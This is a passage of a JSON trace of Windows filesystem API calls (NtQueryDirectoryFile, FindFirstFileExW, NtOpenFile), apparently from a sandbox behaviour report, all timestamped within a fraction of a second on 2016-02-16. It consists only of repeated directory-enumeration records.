17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,108", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,118", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": 
"FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,128", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", 
"api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,138", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,148", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,158", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:39,168", "api": 